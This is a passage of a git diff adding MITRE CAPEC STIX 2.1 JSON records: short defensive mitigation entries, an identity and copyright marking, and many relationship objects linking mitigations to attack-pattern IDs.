b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd02f250-4a93-4e2e-8dc8-bd3e4abc9db8.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--de1f6f09-ed27-46c0-a150-bd6faacee24c", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Use wireless technologies to connect to external display devices.", + "id": "course-of-action--fd02f250-4a93-4e2e-8dc8-bd3e4abc9db8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e.json new file mode 100644 index 0000000000000000000000000000000000000000..34c0f75dddedd6a64511b17238d2422884331a5f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--098f97d3-52c3-4449-93fd-34cc7b568580", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.", + "id": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc.json new file mode 100644 index 0000000000000000000000000000000000000000..f62c30f3db40b16e044ae39a6726815730b62f63 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--fa20ddfb-a05f-4252-ae78-f1072bdc27c5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform input validation for all content.", + "id": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7.json new file mode 100644 index 0000000000000000000000000000000000000000..ed2b05afa9fe2f20e37c92ca4228f6296056eee9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--eee2baa1-5ec8-4acb-89b0-40e4c1c89b97", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Change default passwords by choosing strong passwords.", + "id": "course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-169-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d.json new file mode 100644 index 0000000000000000000000000000000000000000..4a71f7d0822f2a3ba224dd43a7c4695f21165d03 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--3c628647-d5ab-44f9-9d97-d5e76a1d58d5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data.", + "id": "course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fdda562a-133a-447b-9a9c-764b70f09841.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fdda562a-133a-447b-9a9c-764b70f09841.json new file mode 100644 index 0000000000000000000000000000000000000000..e1697b90785aba37dc3650b93dff430ca1b3f13c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fdda562a-133a-447b-9a9c-764b70f09841.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--895a5f5b-b1b8-46de-89d6-5e946da7cc53", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design the communication system such that it associates proper authentication/authorization with each channel/message.", + "id": "course-of-action--fdda562a-133a-447b-9a9c-764b70f09841", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-216-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158.json new file mode 100644 index 0000000000000000000000000000000000000000..0906284604655a21d127c23edf2322d9b0c9e096 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--47ac5bc5-5905-4b82-ab23-9f7467ee37e5", + "objects": [ + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. Use an allowlist of acceptable classes.\n ", + "id": "course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fe9d8853-a306-4443-b34e-d9d755890734.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fe9d8853-a306-4443-b34e-d9d755890734.json new file mode 100644 index 0000000000000000000000000000000000000000..d44805965634b161a42395419bb46668186b7ac2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--fe9d8853-a306-4443-b34e-d9d755890734.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--0639c56a-2d52-4c68-b887-f5cd33fbb16e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor traffic and resource usage and pay attention if resource exhaustion occurs.", + "id": "course-of-action--fe9d8853-a306-4443-b34e-d9d755890734", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa.json new file mode 100644 index 0000000000000000000000000000000000000000..afc5d01b88c145af57128c7f0088d873cc8b3cc2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--60ca9c62-4589-4d85-bf90-63e31c81e3c2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys.", + "id": "course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388.json new file mode 100644 index 0000000000000000000000000000000000000000..12d96b38f3ec0452ce3f19da07247d88fa5b3864 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--5a212ef0-8824-4d2d-b4bb-14f514f4e172", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate all untrusted data.", + "id": "course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/identity/identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd.json b/cti-ATT-CK-v13.1/capec/2.1/identity/identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd.json new file mode 100644 index 0000000000000000000000000000000000000000..5903b339ea0c6f21eaf26388c3a9060922884341 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/identity/identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd.json @@ -0,0 +1,18 @@ +{ + "id": "bundle--964ea7f7-09b1-4498-a564-b7056c8aa385", + "objects": [ + { + "created": "2023-01-30T20:40:28.791901Z", + "id": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "identity_class": "organization", + "modified": "2023-01-30T20:40:28.791901Z", + "name": "The MITRE Corporation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "identity" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/marking-definition/marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d.json b/cti-ATT-CK-v13.1/capec/2.1/marking-definition/marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d.json new file mode 100644 index 0000000000000000000000000000000000000000..7f9445b99c861aef22b2ce484493590401c0f7c9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/marking-definition/marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d.json @@ -0,0 +1,16 @@ +{ + "id": "bundle--9050ead2-1bb4-4a04-aa53-2bf5681db2ce", + "objects": [ + { + "created": "2023-01-30T20:40:28.791035Z", + "definition": { + "statement": "CAPEC is sponsored by US-CERT in the office of Cybersecurity and Communications at the U.S. Department of Homeland Security. Copyright © 2007 - 2023, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation." + }, + "definition_type": "statement", + "id": "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d", + "spec_version": "2.1", + "type": "marking-definition" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d.json new file mode 100644 index 0000000000000000000000000000000000000000..e517fc602daa83c385aac8423618b7429bf4cc6a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--b97d6962-434a-47f6-b650-26881ae8dc7b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--002041eb-05e7-4cd3-ba28-e881bb148370.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--002041eb-05e7-4cd3-ba28-e881bb148370.json new file mode 100644 index 0000000000000000000000000000000000000000..9402edf531eff5b6064d346e7bdd69362f08a3cd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--002041eb-05e7-4cd3-ba28-e881bb148370.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e1b59b91-a56a-445b-95d2-790becc11c1d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002041eb-05e7-4cd3-ba28-e881bb148370", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--426e0345-2074-48c8-9a3d-b7f7550e3712", + "spec_version": "2.1", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--002a4543-59cc-405d-b6f7-835ee0f6b124.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--002a4543-59cc-405d-b6f7-835ee0f6b124.json new file mode 100644 index 0000000000000000000000000000000000000000..09fd41f79393d7264da5bfce92f171930cd06ed3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--002a4543-59cc-405d-b6f7-835ee0f6b124.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--0646f876-8565-491a-a89d-6994b4d6125c", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002a4543-59cc-405d-b6f7-835ee0f6b124", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--177c82cf-28a6-4bec-ad88-7f539639ef51", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--00382075-fd38-4145-ac07-88fa46ab5e82.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--00382075-fd38-4145-ac07-88fa46ab5e82.json new file mode 100644 index 0000000000000000000000000000000000000000..11f631bbb250e39f39e4c68de81612fe63eac7eb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--00382075-fd38-4145-ac07-88fa46ab5e82.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--6f238872-7208-45ce-bc27-93b57cd838af", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00382075-fd38-4145-ac07-88fa46ab5e82", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--006acdf6-fa11-4dbc-b447-35cfd3577991.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--006acdf6-fa11-4dbc-b447-35cfd3577991.json new file mode 100644 index 0000000000000000000000000000000000000000..7f72756decc3f2a5a3dd475511ebe5aec267d82c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--006acdf6-fa11-4dbc-b447-35cfd3577991.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--3eb01aed-c805-4b39-833b-3fcb683adcc9", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--006acdf6-fa11-4dbc-b447-35cfd3577991", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf22f1fa-b5cb-4733-a825-810c681f76aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--007dc896-33a1-418f-8400-a4ae48f79658.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--007dc896-33a1-418f-8400-a4ae48f79658.json new file mode 100644 index 0000000000000000000000000000000000000000..2191ef91a4f7727611f21783d6349530e767694f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--007dc896-33a1-418f-8400-a4ae48f79658.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c00e8cc9-22f1-4cba-81e5-aead4834a2da", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--007dc896-33a1-418f-8400-a4ae48f79658", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86466080-30aa-42b1-a6cc-f8103cf49498", + "spec_version": "2.1", + "target_ref": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6.json new file mode 100644 index 0000000000000000000000000000000000000000..158a13d8a85e3c48105ddea6d8cf84edcaea7e65 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--7aaa2182-2784-48e6-b731-82215def4c3c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--008a8e1b-0ad9-49c8-8c07-6d960df810f6", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2401986-f0a6-4a28-bff4-59db19c2000c", + "spec_version": "2.1", + "target_ref": "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56.json new file mode 100644 index 0000000000000000000000000000000000000000..f35c39f23c323c640c58f30dcd33dd299fceb691 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--6097953f-3ca2-4eb4-9ea1-2cfdf403124b", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1.json new file mode 100644 index 0000000000000000000000000000000000000000..c0f9978f729a02388e633f8aaeaa6a20368ef789 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--fcc06222-1e3b-462c-a461-1251fe1f0be0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b.json new file mode 100644 index 0000000000000000000000000000000000000000..a85c726e32fe61eac1791f885d623507e0483966 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--cf938a2d-21e4-4d5f-b040-99796a866d68", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--011efc3d-4f04-4a7a-9a14-95f8855cbd0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6de86e67-2849-4490-9556-799ba134737f", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8.json new file mode 100644 index 0000000000000000000000000000000000000000..70a7396b08e29684735ed0778b0ac6f8de37161f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--97500443-bdf7-427d-a997-a9c2994dc2ff", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "spec_version": "2.1", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0174af7d-b07c-4326-98d7-485d81f6876c.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0174af7d-b07c-4326-98d7-485d81f6876c.json new file mode 100644 index 0000000000000000000000000000000000000000..0bd0a23d17b78e90400b3e25c9415b43380ea2ef --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0174af7d-b07c-4326-98d7-485d81f6876c.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--2e753c52-8a51-460f-bf5e-82fe5b19cec5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0174af7d-b07c-4326-98d7-485d81f6876c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "spec_version": "2.1", + "target_ref": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954.json new file mode 100644 index 0000000000000000000000000000000000000000..e69d206a994c6a43c3cee30525a052ea6a101034 --- /dev/null +++ 